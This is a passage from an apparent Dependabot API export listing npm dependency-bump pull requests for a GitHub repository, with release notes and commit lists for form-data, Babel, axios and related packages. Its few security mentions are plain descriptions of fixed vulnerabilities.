href=\"https://github.com/form-data/form-data/compare/v4.0.3...v4.0.4\"\u003ev4.0.4\u003c/a\u003e - 2025-07-16\u003c/h2\u003e\n\u003ch3\u003eCommits\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[meta] add \u003ccode\u003eauto-changelog\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/811f68282fab0315209d0e2d1c44b6c32ea0d479\"\u003e\u003ccode\u003e811f682\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] handle predict-v8-randomness failures in node \u0026lt; 17 and node \u0026gt; 23 \u003ca href=\"https://github.com/form-data/form-data/commit/1d11a76434d101f22fdb26b8aef8615f28b98402\"\u003e\u003ccode\u003e1d11a76\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] Switch to using \u003ccode\u003ecrypto\u003c/code\u003e random for boundary values \u003ca href=\"https://github.com/form-data/form-data/commit/3d1723080e6577a66f17f163ecd345a21d8d0fd0\"\u003e\u003ccode\u003e3d17230\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] fix linting errors \u003ca href=\"https://github.com/form-data/form-data/commit/5e340800b5f8914213e4e0378c084aae71cfd73a\"\u003e\u003ccode\u003e5e34080\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] actually ensure the readme backup isn’t published \u003ca href=\"https://github.com/form-data/form-data/commit/316c82ba93fd4985af757b771b9a1f26d3b709ef\"\u003e\u003ccode\u003e316c82b\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/58c25d76406a5b0dfdf54045cf252563f2bbda8d\"\u003e\u003ccode\u003e58c25d7\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] fix readme capitalization \u003ca href=\"https://github.com/form-data/form-data/commit/2300ca19595b0ee96431e868fe2a40db79e41c61\"\u003e\u003ccode\u003e2300ca1\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/form-data/form-data/compare/v4.0.2...v4.0.3\"\u003ev4.0.3\u003c/a\u003e - 2025-06-05\u003c/h2\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eappend\u003c/code\u003e: avoid a crash on nullish values \u003ca href=\"https://redirect.github.com/form-data/form-data/issues/577\"\u003e\u003ccode\u003e[#577](https://github.com/form-data/form-data/issues/577)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eCommits\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[eslint] use a shared config \u003ca href=\"https://github.com/form-data/form-data/commit/426ba9ac440f95d1998dac9a5cd8d738043b048f\"\u003e\u003ccode\u003e426ba9a\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[eslint] fix some spacing issues \u003ca href=\"https://github.com/form-data/form-data/commit/20941917f0e9487e68c564ebc3157e23609e2939\"\u003e\u003ccode\u003e2094191\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Refactor] use \u003ccode\u003ehasown\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/81ab41b46fdf34f5d89d7ff30b513b0925febfaa\"\u003e\u003ccode\u003e81ab41b\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] validate boundary type in \u003ccode\u003esetBoundary()\u003c/code\u003e method \u003ca href=\"https://github.com/form-data/form-data/commit/8d8e4693093519f7f18e3c597d1e8df8c493de9e\"\u003e\u003ccode\u003e8d8e469\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] add tests to check the behavior of \u003ccode\u003egetBoundary\u003c/code\u003e with non-strings \u003ca href=\"https://github.com/form-data/form-data/commit/837b8a1f7562bfb8bda74f3fc538adb7a5858995\"\u003e\u003ccode\u003e837b8a1\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] remove unused deps \u003ca href=\"https://github.com/form-data/form-data/commit/870e4e665935e701bf983a051244ab928e62d58e\"\u003e\u003ccode\u003e870e4e6\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] remove local commit hooks \u003ca href=\"https://github.com/form-data/form-data/commit/e6e83ccb545a5619ed6cd04f31d5c2f655eb633e\"\u003e\u003ccode\u003ee6e83cc\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003eeslint\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/4066fd6f65992b62fa324a6474a9292a4f88c916\"\u003e\u003ccode\u003e4066fd6\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] fix scripts to use prepublishOnly \u003ca href=\"https://github.com/form-data/form-data/commit/c4bbb13c0ef669916657bc129341301b1d331d75\"\u003e\u003ccode\u003ec4bbb13\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/form-data/form-data/compare/v4.0.1...v4.0.2\"\u003ev4.0.2\u003c/a\u003e - 2025-02-14\u003c/h2\u003e\n\u003ch3\u003eMerged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] set \u003ccode\u003eSymbol.toStringTag\u003c/code\u003e when available \u003ca href=\"https://redirect.github.com/form-data/form-data/pull/573\"\u003e\u003ccode\u003e[#573](https://github.com/form-data/form-data/issues/573)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] set \u003ccode\u003eSymbol.toStringTag\u003c/code\u003e when available \u003ca href=\"https://redirect.github.com/form-data/form-data/pull/573\"\u003e\u003ccode\u003e[#573](https://github.com/form-data/form-data/issues/573)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix (npmignore): ignore temporary build files \u003ca href=\"https://redirect.github.com/form-data/form-data/pull/532\"\u003e\u003ccode\u003e[#532](https://github.com/form-data/form-data/issues/532)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix (npmignore): ignore temporary build files \u003ca href=\"https://redirect.github.com/form-data/form-data/pull/532\"\u003e\u003ccode\u003e[#532](https://github.com/form-data/form-data/issues/532)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] set \u003ccode\u003eSymbol.toStringTag\u003c/code\u003e when available (\u003ca href=\"https://redirect.github.com/form-data/form-data/issues/573\"\u003e#573\u003c/a\u003e) \u003ca href=\"https://redirect.github.com/form-data/form-data/issues/396\"\u003e\u003ccode\u003e[#396](https://github.com/form-data/form-data/issues/396)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] set \u003ccode\u003eSymbol.toStringTag\u003c/code\u003e when available (\u003ca href=\"https://redirect.github.com/form-data/form-data/issues/573\"\u003e#573\u003c/a\u003e) \u003ca href=\"https://redirect.github.com/form-data/form-data/issues/396\"\u003e\u003ccode\u003e[#396](https://github.com/form-data/form-data/issues/396)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] set \u003ccode\u003eSymbol.toStringTag\u003c/code\u003e when available \u003ca href=\"https://redirect.github.com/form-data/form-data/issues/396\"\u003e\u003ccode\u003e[#396](https://github.com/form-data/form-data/issues/396)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eCommits\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eMerge tags v2.5.3 and v3.0.3 \u003ca href=\"https://github.com/form-data/form-data/commit/92613b9208556eb4ebc482fdf599fae111626fb6\"\u003e\u003ccode\u003e92613b9\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] migrate from travis to GHA \u003ca href=\"https://github.com/form-data/form-data/commit/806eda77740e6e3c67c7815afb216f2e1f187ba5\"\u003e\u003ccode\u003e806eda7\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] migrate from travis to GHA \u003ca href=\"https://github.com/form-data/form-data/commit/8fdb3bc6b5d001f8909a9fca391d1d1d97ef1d79\"\u003e\u003ccode\u003e8fdb3bc\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/41996f5ac73a867046d48512cab62e64fc846dad\"\u003e\u003ccode\u003e41996f5\u003c/code\u003e\u003c/a\u003e v4.0.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/316c82ba93fd4985af757b771b9a1f26d3b709ef\"\u003e\u003ccode\u003e316c82b\u003c/code\u003e\u003c/a\u003e [meta] actually ensure the readme backup isn’t published\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/2300ca19595b0ee96431e868fe2a40db79e41c61\"\u003e\u003ccode\u003e2300ca1\u003c/code\u003e\u003c/a\u003e [meta] fix readme capitalization\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/811f68282fab0315209d0e2d1c44b6c32ea0d479\"\u003e\u003ccode\u003e811f682\u003c/code\u003e\u003c/a\u003e [meta] add \u003ccode\u003eauto-changelog\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/5e340800b5f8914213e4e0378c084aae71cfd73a\"\u003e\u003ccode\u003e5e34080\u003c/code\u003e\u003c/a\u003e [Tests] fix linting errors\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/1d11a76434d101f22fdb26b8aef8615f28b98402\"\u003e\u003ccode\u003e1d11a76\u003c/code\u003e\u003c/a\u003e [Tests] handle predict-v8-randomness failures in node \u0026lt; 17 and node \u0026gt; 23\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/58c25d76406a5b0dfdf54045cf252563f2bbda8d\"\u003e\u003ccode\u003e58c25d7\u003c/code\u003e\u003c/a\u003e [Dev Deps] update \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/3d1723080e6577a66f17f163ecd345a21d8d0fd0\"\u003e\u003ccode\u003e3d17230\u003c/code\u003e\u003c/a\u003e [Fix] Switch to using \u003ccode\u003ecrypto\u003c/code\u003e random for boundary values\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/d8d67dc8ac79285154edf7d3f57dbab593b9a146\"\u003e\u003ccode\u003ed8d67dc\u003c/code\u003e\u003c/a\u003e v4.0.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/e6e83ccb545a5619ed6cd04f31d5c2f655eb633e\"\u003e\u003ccode\u003ee6e83cc\u003c/code\u003e\u003c/a\u003e [meta] remove local commit hooks\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/form-data/form-data/compare/v4.0.0...v4.0.4\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~ljharb\"\u003eljharb\u003c/a\u003e, a new releaser for form-data since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eInstall script changes\u003c/summary\u003e\n\u003cp\u003eThis version modifies \u003ccode\u003eprepublish\u003c/code\u003e script that runs during installation. Review the package contents before updating.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@babel/runtime-corejs3` from 7.13.9 to 7.29.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/babel/babel/releases\"\u003e\u003ccode\u003e@​babel/runtime-corejs3\u003c/code\u003e's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev7.29.2 (2026-03-16)\u003c/h2\u003e\n\u003ch4\u003e:eyeglasses: Spec Compliance\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-parser\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17840\"\u003e#17840\u003c/a\u003e [7.x backport] async x =\u0026gt; {} must be in leading pos (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-helpers\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-async-generator-functions\u003c/code\u003e, \u003ccode\u003ebabel-preset-env\u003c/code\u003e, \u003ccode\u003ebabel-runtime-corejs3\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17805\"\u003e#17805\u003c/a\u003e [7.x backport] fix: Properly handle await in finally (\u003ca href=\"https://github.com/liuxingbaoyu\"\u003e\u003ccode\u003e@​liuxingbaoyu\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-preset-env\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17789\"\u003e#17789\u003c/a\u003e [7.x backport] preset-env include/exclude should accept bugfix plugins (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:house: Internal\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17813\"\u003e#17813\u003c/a\u003e chore: update eslint peer deps (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eCommitters: 2\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eHuáng Jùnliàng (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/liuxingbaoyu\"\u003e\u003ccode\u003e@​liuxingbaoyu\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.29.1 (2026-02-04)\u003c/h2\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-standalone\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17771\"\u003e#17771\u003c/a\u003e [7.x backport] fix: ensure \u003ccode\u003etargets.esmodules\u003c/code\u003e is validated (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-generator\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17776\"\u003e#17776\u003c/a\u003e [7.x backport] Fix undefined when 64 indents (\u003ca href=\"https://github.com/liuxingbaoyu\"\u003e\u003ccode\u003e@​liuxingbaoyu\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eCommitters: 2\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eHuáng Jùnliàng (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/liuxingbaoyu\"\u003e\u003ccode\u003e@​liuxingbaoyu\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.29.0 (2026-01-31)\u003c/h2\u003e\n\u003cp\u003eThanks \u003ca href=\"https://github.com/simbahax\"\u003e\u003ccode\u003e@​simbahax\u003c/code\u003e\u003c/a\u003e for your first PR!\u003c/p\u003e\n\u003ch4\u003e:rocket: New Feature\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-types\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17750\"\u003e#17750\u003c/a\u003e [7.x backport] Add attributes import declaration builder (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-standalone\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17663\"\u003e#17663\u003c/a\u003e [7.x backport] feat(standalone): export async transform (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17725\"\u003e#17725\u003c/a\u003e [7.x backport] feat: read standalone targets from data-targets (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-parser\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17765\"\u003e#17765\u003c/a\u003e fix(parser): correctly parse type assertions in \u003ccode\u003eextends\u003c/code\u003e clause (\u003ca href=\"https://github.com/nicolo-ribaudo\"\u003e\u003ccode\u003e@​nicolo-ribaudo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17723\"\u003e#17723\u003c/a\u003e [7.x backport] fix(parser): improve super type argument parsing (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-traverse\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17708\"\u003e#17708\u003c/a\u003e fix(traverse): provide a hub when traversing a File or Program and no parentPath is given (\u003ca href=\"https://github.com/simbahax\"\u003e\u003ccode\u003e@​simbahax\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-plugin-transform-block-scoping\u003c/code\u003e, \u003ccode\u003ebabel-traverse\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17737\"\u003e#17737\u003c/a\u003e [7.x backport] fix: Rename switch discriminant references when body creates shadowing variable (\u003ca href=\"https://github.com/magic-akari\"\u003e\u003ccode\u003e@​magic-akari\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/37d5595fca9f188f0534458180611f2e776acd31\"\u003e\u003ccode\u003e37d5595\u003c/code\u003e\u003c/a\u003e v7.29.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/1c0a08d95ae7e1c788c7e1ae3a10ee53f7c86864\"\u003e\u003ccode\u003e1c0a08d\u003c/code\u003e\u003c/a\u003e [7.x backport] fix: Properly handle await in finally (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-runtime-corejs3/issues/17805\"\u003e#17805\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/aa8394e454337d118ac3d40bfa3ee1a3cb3f3ed2\"\u003e\u003ccode\u003eaa8394e\u003c/code\u003e\u003c/a\u003e v7.29...\n\n_Description has been truncated_","html_url":"https://github.com/iDereje/badges/pull/17","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/iDereje%2Fbadges/issues/17","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/17/packages"},{"uuid":"4238649846","node_id":"PR_kwDONns3ec7RbKV5","number":39,"state":"closed","title":"Bump the npm_and_yarn group across 1 directory with 29 updates","user":"dependabot[bot]","labels":["dependencies","javascript"],"assignees":[],"locked":false,"comments_count":2,"pull_request":true,"closed_at":"2026-04-11T15:16:27.000Z","author_association":null,"state_reason":null,"created_at":"2026-04-10T11:02:11.000Z","updated_at":"2026-04-11T15:16:29.000Z","time_to_close":101656,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Bump","group_name":"npm_and_yarn","update_count":29,"packages":[{"name":"axios","old_version":"0.23.0","new_version":"1.15.0","repository_url":"https://github.com/axios/axios"},{"name":"js-yaml","old_version":"3.14.1","new_version":"3.14.2","repository_url":"https://github.com/nodeca/js-yaml"},{"name":"js-yaml","old_version":"4.1.0","new_version":"4.1.1","repository_url":"https://github.com/nodeca/js-yaml"},{"name":"node-forge","old_version":"1.3.0","new_version":"1.4.0","repository_url":"https://github.com/digitalbazaar/forge"},{"name":"@babel/traverse","old_version":"7.14.2","new_version":"7.29.0","repository_url":"https://github.com/babel/babel"},{"name":"@octokit/plugin-paginate-rest","old_version":"2.21.3","new_version":"14.0.0","repository_url":"https://github.com/octokit/plugin-paginate-rest.js"},{"name":"@tootallnate/once","old_version":"1.1.2","new_version":"removed","repository_url":"https://github.com/TooTallNate/once"},{"name":"body-parser","old_version":"1.19.0","new_version":"1.20.4","repository_url":"https://github.com/expressjs/body-parser"},{"name":"express","old_version":"4.17.1","new_version":"4.22.1","repository_url":"https://github.com/expressjs/express"},{"name":"brace-expansion","old_version":"1.1.11","new_version":"1.1.13","repository_url":"https://github.com/juliangruber/brace-expansion"},{"name":"braces","old_version":"3.0.2","new_version":"3.0.3","repository_url":"https://github.com/micromatch/braces"},{"name":"diff","old_version":"4.0.2","new_version":"4.0.4","repository_url":"https://github.com/kpdecker/jsdiff"},{"name":"flatted","old_version":"3.1.1","new_version":"3.4.2","repository_url":"https://github.com/WebReflection/flatted"},{"name":"got","old_version":"9.6.0","new_version":"removed","repository_url":"https://github.com/sindresorhus/got"},{"name":"json5","old_version":"1.0.1","new_version":"1.0.2","repository_url":"https://github.com/json5/json5"},{"name":"lodash","old_version":"4.17.21","new_version":"4.18.1","repository_url":"https://github.com/lodash/lodash"},{"name":"minimatch","old_version":"3.0.4","new_version":"3.1.5","repository_url":"https://github.com/isaacs/minimatch"},{"name":"on-headers","old_version":"1.0.2","new_version":"1.1.0","repository_url":"https://github.com/jshttp/on-headers"},{"name":"picomatch","old_version":"2.3.0","new_version":"2.3.2","repository_url":"https://github.com/micromatch/picomatch"},{"name":"tar-fs","old_version":"2.0.1","new_version":"2.1.4","repository_url":"https://github.com/mafintosh/tar-fs"}],"path":null,"ecosystem":"npm"},"body":"Bumps the npm_and_yarn group with 19 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [axios](https://github.com/axios/axios) | `0.23.0` | `1.15.0` |\n| [js-yaml](https://github.com/nodeca/js-yaml) | `3.14.1` | `3.14.2` |\n| [js-yaml](https://github.com/nodeca/js-yaml) | `4.1.0` | `4.1.1` |\n| [node-forge](https://github.com/digitalbazaar/forge) | `1.3.0` | `1.4.0` |\n| [@babel/traverse](https://github.com/babel/babel/tree/HEAD/packages/babel-traverse) | `7.14.2` | `7.29.0` |\n| [@octokit/plugin-paginate-rest](https://github.com/octokit/plugin-paginate-rest.js) | `2.21.3` | `14.0.0` |\n| [@tootallnate/once](https://github.com/TooTallNate/once) | `1.1.2` | `removed` |\n| [body-parser](https://github.com/expressjs/body-parser) | `1.19.0` | `1.20.4` |\n| [express](https://github.com/expressjs/express) | `4.17.1` | `4.22.1` |\n| [brace-expansion](https://github.com/juliangruber/brace-expansion) | `1.1.11` | `1.1.13` |\n| [braces](https://github.com/micromatch/braces) | `3.0.2` | `3.0.3` |\n| [diff](https://github.com/kpdecker/jsdiff) | `4.0.2` | `4.0.4` |\n| [flatted](https://github.com/WebReflection/flatted) | `3.1.1` | `3.4.2` |\n| [got](https://github.com/sindresorhus/got) | `9.6.0` | `removed` |\n| [json5](https://github.com/json5/json5) | `1.0.1` | `1.0.2` |\n| [lodash](https://github.com/lodash/lodash) | `4.17.21` | `4.18.1` |\n| [minimatch](https://github.com/isaacs/minimatch) | `3.0.4` | `3.1.5` |\n| [on-headers](https://github.com/jshttp/on-headers) | `1.0.2` | `1.1.0` |\n| [picomatch](https://github.com/micromatch/picomatch) | `2.3.0` | `2.3.2` |\n| [tar-fs](https://github.com/mafintosh/tar-fs) | `2.0.1` | `2.1.4` |\n\n\nUpdates `axios` from 0.23.0 to 1.15.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/axios/axios/releases\"\u003eaxios's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.15.0\u003c/h2\u003e\n\u003cp\u003eThis release delivers two critical security patches, adds runtime support for Deno and Bun, and includes significant CI hardening, documentation improvements, and routine dependency updates.\u003c/p\u003e\n\u003ch2\u003e⚠️ Important Changes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDeprecation:\u003c/strong\u003e \u003ccode\u003eurl.parse()\u003c/code\u003e usage has been replaced to address Node.js deprecation warnings. If you are on a recent version of Node.js, this resolves console warnings you may have been seeing. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10625\"\u003e#10625\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🔒 Security Fixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eProxy Handling:\u003c/strong\u003e Fixed a \u003ccode\u003eno_proxy\u003c/code\u003e hostname normalisation bypass that could lead to Server-Side Request Forgery (SSRF). (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10661\"\u003e#10661\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eHeader Injection:\u003c/strong\u003e Fixed an unrestricted cloud metadata exfiltration vulnerability via a header injection chain. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10660\"\u003e#10660\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🚀 New Features\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eRuntime Support:\u003c/strong\u003e Added compatibility checks and documentation for Deno and Bun environments. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10652\"\u003e#10652\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10653\"\u003e#10653\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🔧 Maintenance \u0026amp; Chores\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eCI Security:\u003c/strong\u003e Hardened workflow permissions to least privilege, added the \u003ccode\u003ezizmor\u003c/code\u003e security scanner, pinned action versions, and gated npm publishing with OIDC and environment protection. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10618\"\u003e#10618\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca 